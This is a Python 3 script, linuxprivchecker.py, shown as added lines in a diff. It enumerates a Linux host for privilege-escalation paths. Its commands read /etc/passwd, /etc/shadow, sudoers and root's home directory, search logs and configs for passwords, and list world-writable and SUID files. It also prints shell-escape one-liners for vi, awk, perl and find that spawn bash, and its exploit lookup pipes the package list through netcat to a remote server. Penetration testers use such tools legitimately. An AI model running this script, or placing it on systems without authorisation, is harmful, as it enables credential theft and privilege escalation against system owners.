| 1 | + | #!/usr/bin/env python3 |
| 2 | + | |
| 3 | + | ############################################################################################################### |
| 4 | + | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script for python 3 |
| 5 | + | ## [Original Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift |
| 6 | + | ## [Updater]: Mike Merrill (linted) |
| 7 | + | ##------------------------------------------------------------------------------------------------------------- |
| 8 | + | ## [Details]: |
| 9 | + | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and |
| 10 | + | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text |
| 11 | + | ## passwords and applicable exploits. |
| 12 | + | ##------------------------------------------------------------------------------------------------------------- |
| 13 | + | ## [Warning]: |
| 14 | + | ## This script comes as-is with no promise of functionality or accuracy. |
| 15 | + | ##------------------------------------------------------------------------------------------------------------- |
| 16 | + | ## [Modification, Distribution, and Attribution]: |
| 17 | + | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original |
| 18 | + | ## author attribution and not attempt to sell it or incorporate it into any commercial offering. |
| 19 | + | ############################################################################################################### |
| 20 | + | |
| 21 | + | # conditional import for older versions of python not compatible with subprocess |
| 22 | + | from concurrent import futures |
| 23 | + | from functools import partial |
| 24 | + | |
| 25 | + | |
| 26 | + | try: |
| 27 | + | from asyncio import ( |
| 28 | + | create_subprocess_shell, |
| 29 | + | get_running_loop, |
| 30 | + | subprocess, |
| 31 | + | wait, |
| 32 | + | run, |
| 33 | + | FIRST_COMPLETED, |
| 34 | + | ) |
| 35 | + | except ImportError: |
| 36 | + | print( |
| 37 | + | "[-] Import Error: This version of python does not have the required libraries" |
| 38 | + | ) |
| 39 | + | |
| 40 | + | |
| 41 | + | async def getCmdResults(cmd, task): |
| 42 | + | results = await task |
| 43 | + | stdout = await results.stdout.read() |
| 44 | + | output = stdout.decode().strip().split("\n") |
| 45 | + | |
| 46 | + | return (cmd, output) |
| 47 | + | |
| 48 | + | |
| 49 | + | # loop through dictionary, execute the commands, store the results, return updated dict |
| 50 | + | async def execCmd(cmdDict): |
| 51 | + | futures = [] |
| 52 | + | for item in cmdDict: |
| 53 | + | cmd = cmdDict[item]["cmd"] |
| 54 | + | futures.append( |
| 55 | + | getCmdResults( |
| 56 | + | item, |
| 57 | + | create_subprocess_shell( |
| 58 | + | cmd, |
| 59 | + | stdout=subprocess.PIPE, |
| 60 | + | stderr=subprocess.STDOUT, |
| 61 | + | ), |
| 62 | + | ) |
| 63 | + | ) |
| 64 | + | |
| 65 | + | todo = futures |
| 66 | + | while len(todo) > 0: |
| 67 | + | done, todo = await wait(todo, return_when=FIRST_COMPLETED) |
| 68 | + | for task in done: |
| 69 | + | # print(dir(task.result())) |
| 70 | + | try: |
| 71 | + | item, results = task.result() |
| 72 | + | except Exception as e: |
| 73 | + | item = e |
| 74 | + | results = ["[-] failed: {}".format(e)] |
| 75 | + | cmdDict[item]['results'] = results |
| 76 | + | printResults(cmdDict) |
| 77 | + | |
| 78 | + | |
| 79 | + | # print results for each previously executed command, no return value |
| 80 | + | def printResults(cmdDict): |
| 81 | + | output = '' |
| 82 | + | for item in cmdDict: |
| 83 | + | msg = cmdDict[item]["msg"] |
| 84 | + | results = cmdDict[item]["results"] |
| 85 | + | output += "[+] {}\n".format(msg) |
| 86 | + | for result in results: |
| 87 | + | if result.strip() != "": |
| 88 | + | output += " {}\n".format(result.rstrip()) |
| 89 | + | print(output) |
| 90 | + | |
| 91 | + | |
| 92 | + | def parseAppProc(): |
| 93 | + | procs = getAppProc["PROCS"]["results"] |
| 94 | + | pkgs = getAppProc["PKGS"]["results"] |
| 95 | + | supusers = userInfo["SUPUSERS"]["results"] |
| 96 | + | procdict = {} # dictionary to hold the processes running as super users |
| 97 | + | |
| 98 | + | for proc in procs: # loop through each process |
| 99 | + | relatedpkgs = [] # list to hold the packages related to a process |
| 100 | + | try: |
| 101 | + | for user in supusers: # loop through the known super users |
| 102 | + | if (user != "") and ( |
| 103 | + | user in proc |
| 104 | + | ): # if the process is being run by a super user |
| 105 | + | procname = proc.split(" ")[4] # grab the process name |
| 106 | + | if "/" in procname: |
| 107 | + | splitname = procname.split("/") |
| 108 | + | procname = splitname[len(splitname) - 1] |
| 109 | + | for pkg in pkgs: # loop through the packages |
| 110 | + | if ( |
| 111 | + | not len(procname) < 3 |
| 112 | + | ): # name too short to get reliable package results |
| 113 | + | if procname in pkg: |
| 114 | + | if procname in procdict: |
| 115 | + | relatedpkgs = procdict[ |
| 116 | + | proc |
| 117 | + | ] # if already in the dict, grab its pkg list |
| 118 | + | if pkg not in relatedpkgs: |
| 119 | + | relatedpkgs.append(pkg) # add pkg to the list |
| 120 | + | procdict[ |
| 121 | + | proc |
| 122 | + | ] = relatedpkgs # add any found related packages to the process dictionary entry |
| 123 | + | except: |
| 124 | + | pass |
| 125 | + | |
| 126 | + | for key in procdict: |
| 127 | + | print(" " + key) # print the process name |
| 128 | + | try: |
| 129 | + | if ( |
| 130 | + | not procdict[key][0] == "" |
| 131 | + | ): # only print the rest if related packages were found |
| 132 | + | print(" Possible Related Packages: ") |
| 133 | + | for entry in procdict[key]: |
| 134 | + | print(" " + entry) # print each related package |
| 135 | + | except: |
| 136 | + | pass |
| 137 | + | |
| 138 | + | |
| 139 | + | def parseDevTools(): |
| 140 | + | for cmd in escapeCmd: |
| 141 | + | for result in devTools["TOOLS"]["results"]: |
| 142 | + | if cmd in result: |
| 143 | + | for item in escapeCmd[cmd]: |
| 144 | + | print(" " + cmd + "-->\t" + item) |
| 145 | + | |
| 146 | + | |
| 147 | + | async def vulnLookup(): |
| 148 | + | question = input("[?] Would you like to search for possible exploits? [y/N] ") |
| 149 | + | if "y" in question.lower(): |
| 150 | + | server = input("[?] What is the address of the server? ") |
| 151 | + | port = input("[?] What port is the server using? ") |
| 152 | + | print("[ ] Connecting to {}:{}".format(server, port)) |
| 153 | + | exploits = { |
| 154 | + | "EXPLOITS": { |
| 155 | + | "cmd": "dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format( |
| 156 | + | server, port |
| 157 | + | ), |
| 158 | + | "msg": "Found the following possible exploits", |
| 159 | + | } |
| 160 | + | } |
| 161 | + | await execCmd(exploits) |
| 162 | + | |
| 163 | + | |
| 164 | + | |
| 165 | + | sysInfo = { |
| 166 | + | "OS": {"cmd": "cat /etc/issue", "msg": "Operating System"}, |
| 167 | + | "KERNEL": {"cmd": "cat /proc/version", "msg": "Kernel"}, |
| 168 | + | "HOSTNAME": {"cmd": "hostname", "msg": "Hostname"}, |
| 169 | + | } |
| 170 | + | |
| 171 | + | |
| 172 | + | netInfo = { |
| 173 | + | "NETINFO": {"cmd": "/sbin/ifconfig -a", "msg": "Interfaces"}, |
| 174 | + | "ROUTE": {"cmd": "route", "msg": "Route"}, |
| 175 | + | "NETSTAT": {"cmd": "netstat -antup | grep -v 'TIME_WAIT'", "msg": "Netstat"}, |
| 176 | + | "IP_Adder": {"cmd": "ip addr", "msg": "ip addr"}, |
| 177 | + | "IP_Route": {"cmd": "ip route", "msg": "ip route"}, |
| 178 | + | "SS": {"cmd": "ss -antup", "msg": "ss"}, |
| 179 | + | } |
| 180 | + | |
| 181 | + | |
| 182 | + | driveInfo = { |
| 183 | + | "MOUNT": {"cmd": "mount", "msg": "Mount results"}, |
| 184 | + | "FSTAB": {"cmd": "cat /etc/fstab 2>/dev/null", "msg": "fstab entries"}, |
| 185 | + | } |
| 186 | + | |
| 187 | + | |
| 188 | + | cronInfo = { |
| 189 | + | "CRON": {"cmd": "ls -la /etc/cron* 2>/dev/null", "msg": "Scheduled cron jobs"}, |
| 190 | + | "CRONW": { |
| 191 | + | "cmd": "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", |
| 192 | + | "msg": "Writable cron dirs", |
| 193 | + | }, |
| 194 | + | } |
| 195 | + | |
| 196 | + | |
| 197 | + | userInfo = { |
| 198 | + | "WHOAMI": {"cmd": "whoami", "msg": "Current User"}, |
| 199 | + | "ID": {"cmd": "id", "msg": "Current User ID"}, |
| 200 | + | "ALLUSERS": {"cmd": "cat /etc/passwd", "msg": "All users"}, |
| 201 | + | "SUPUSERS": { |
| 202 | + | "cmd": "grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", |
| 203 | + | "msg": "Super Users Found:", |
| 204 | + | }, |
| 205 | + | "HISTORY": { |
| 206 | + | "cmd": "ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", |
| 207 | + | "msg": "Root and current user history (depends on privs)", |
| 208 | + | }, |
| 209 | + | "ENV": {"cmd": "env 2>/dev/null | grep -v 'LS_COLORS'", "msg": "Environment"}, |
| 210 | + | "SUDOERS": { |
| 211 | + | "cmd": "cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", |
| 212 | + | "msg": "Sudoers (privileged)", |
| 213 | + | }, |
| 214 | + | "SUDO":{ |
| 215 | + | "cmd": "sudo -nl", |
| 216 | + | "msg": "Current user's sudo permissions", |
| 217 | + | }, |
| 218 | + | "LOGGEDIN": {"cmd": "w 2>/dev/null", "msg": "Logged in User Activity"}, |
| 219 | + | } |
| 220 | + | |
| 221 | + | |
| 222 | + | fdPerms = { |
| 223 | + | "WWDIRSROOT": { |
| 224 | + | "cmd": "find / \( -type d -perm -o+w \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", |
| 225 | + | "msg": "World Writeable Directories for User/Group 'Root'", |
| 226 | + | }, |
| 227 | + | "WWDIRS": { |
| 228 | + | "cmd": "find / \( -type d -perm -o+w \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", |
| 229 | + | "msg": "World Writeable Directories for Users other than Root", |
| 230 | + | }, |
| 231 | + | "WWFILES": { |
| 232 | + | "cmd": "find / \( -wholename '/proc/*' -prune \) -o \( -type f -perm -o+w \) -exec ls -l '{}' ';' 2>/dev/null", |
| 233 | + | "msg": "World Writable Files", |
| 234 | + | }, |
| 235 | + | "SUID": { |
| 236 | + | "cmd": "find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", |
| 237 | + | "msg": "SUID/SGID Files and Directories", |
| 238 | + | }, |
| 239 | + | "ROOTHOME": { |
| 240 | + | "cmd": "ls -ahlR /root 2>/dev/null", |
| 241 | + | "msg": "Checking if root's home folder is accessible", |
| 242 | + | }, |
| 243 | + | } |
| 244 | + | |
| 245 | + | |
| 246 | + | pwdFiles = { |
| 247 | + | "LOGPWDS": { |
| 248 | + | "cmd": "find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", |
| 249 | + | "msg": "Logs containing keyword 'password'", |
| 250 | + | }, |
| 251 | + | "CONFPWDS": { |
| 252 | + | "cmd": "find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", |
| 253 | + | "msg": "Config files containing keyword 'password'", |
| 254 | + | }, |
| 255 | + | "SHADOW": {"cmd": "cat /etc/shadow 2>/dev/null", "msg": "Shadow File (Privileged)"}, |
| 256 | + | } |
| 257 | + | |
| 258 | + | |
| 259 | + | getAppProc = { |
| 260 | + | "PROCS": { |
| 261 | + | "cmd": "ps aux | awk '{print $1,$2,$9,$10,$11}'", |
| 262 | + | "msg": "Current processes", |
| 263 | + | }, |
| 264 | + | "PKGS": {"cmd": "", "msg": "Installed Packages"}, |
| 265 | + | } |
| 266 | + | |
| 267 | + | |
| 268 | + | otherApps = { |
| 269 | + | "SUDO": { |
| 270 | + | "cmd": "sudo -V | grep version 2>/dev/null", |
| 271 | + | "msg": "Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", |
| 272 | + | }, |
| 273 | + | "APACHE": { |
| 274 | + | "cmd": "apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", |
| 275 | + | "msg": "Apache Version and Modules", |
| 276 | + | }, |
| 277 | + | "APACHECONF": { |
| 278 | + | "cmd": "cat /etc/apache2/apache2.conf 2>/dev/null", |
| 279 | + | "msg": "Apache Config File", |
| 280 | + | }, |
| 281 | + | } |
| 282 | + | |
| 283 | + | |
| 284 | + | devTools = { |
| 285 | + | "TOOLS": { |
| 286 | + | "cmd": "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", |
| 287 | + | "msg": "Installed Tools", |
| 288 | + | } |
| 289 | + | } |
| 290 | + | |
| 291 | + | |
| 292 | + | escapeCmd = { |
| 293 | + | "vi": [":!bash", ":set shell=/bin/bash:shell"], |
| 294 | + | "awk": ["awk 'BEGIN {system(\"/bin/bash\")}'"], |
| 295 | + | "perl": ["perl -e 'exec \"/bin/bash\";'"], |
| 296 | + | "find": ["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], |
| 297 | + | "nmap": ["--interactive"], |
| 298 | + | } |
| 299 | + | |
| 300 | + | |
| 301 | + | async def main(): |
| 302 | + | print("{0}\nLINUX PRIVILEGE ESCALATION CHECKER\n{0}".format("=" * 80)) |
| 303 | + | |
| 304 | + | # Basic system info |
| 305 | + | print("[*] GETTING BASIC SYSTEM INFO...\n") |
| 306 | + | await execCmd(sysInfo) |
| 307 | + | |
| 308 | + | # Networking Info |
| 309 | + | print("[*] GETTING NETWORKING INFO...\n") |
| 310 | + | await execCmd(netInfo) |
| 311 | + | |
| 312 | + | # File System Info |
| 313 | + | print("[*] GETTING FILESYSTEM INFO...\n") |
| 314 | + | await execCmd(driveInfo) |
| 315 | + | |
| 316 | + | # Scheduled Cron Jobs |
| 317 | + | print("[*] GETTING CRON JOB INFO... \n") |
| 318 | + | await execCmd(cronInfo) |
| 319 | + | |
| 320 | + | # User Info |
| 321 | + | print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n") |
| 322 | + | await execCmd(userInfo) |
| 323 | + | |
| 324 | + | if "root" in userInfo["ID"]["results"][0]: |
| 325 | + | print("[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n") |
| 326 | + | |
| 327 | + | # File/Directory Privs |
| 328 | + | print("[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n") |
| 329 | + | await execCmd(fdPerms) |
| 330 | + | |
| 331 | + | await execCmd(pwdFiles) |
| 332 | + | |
| 333 | + | # Processes and Applications |
| 334 | + | print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n") |
| 335 | + | if ( |
| 336 | + | "debian" in sysInfo["KERNEL"]["results"][0] |
| 337 | + | or "ubuntu" in sysInfo["KERNEL"]["results"][0] |
| 338 | + | ): |
| 339 | + | getAppProc["PKGS"]["cmd"] = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian |
| 340 | + | else: |
| 341 | + | getAppProc["PKGS"]["cmd"] = "rpm -qa | sort -u" # RH/other |
| 342 | + | await execCmd(getAppProc) |
| 343 | + | await execCmd(otherApps) |
| 344 | + | |
| 345 | + | print( |
| 346 | + | "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" |
| 347 | + | ) |
| 348 | + | parseAppProc() |
| 349 | + | |
| 350 | + | # First discover the avaialable tools |
| 351 | + | print("\n[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n") |
| 352 | + | await execCmd(devTools) |
| 353 | + | |
| 354 | + | print("[+] Related Shell Escape Sequences...\n") |
| 355 | + | # find the package information for the processes currently running |
| 356 | + | # under root or another super user |
| 357 | + | parseDevTools() |
| 358 | + | |
| 359 | + | print("[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n") |
| 360 | + | await vulnLookup() |
| 361 | + | |
| 362 | + | print("\n[+] Finished") |
| 363 | + | print("=" * 80) |
| 364 | + | |
| 365 | + | |
| 366 | + | if __name__ == "__main__": |
| 367 | + | run(main()) |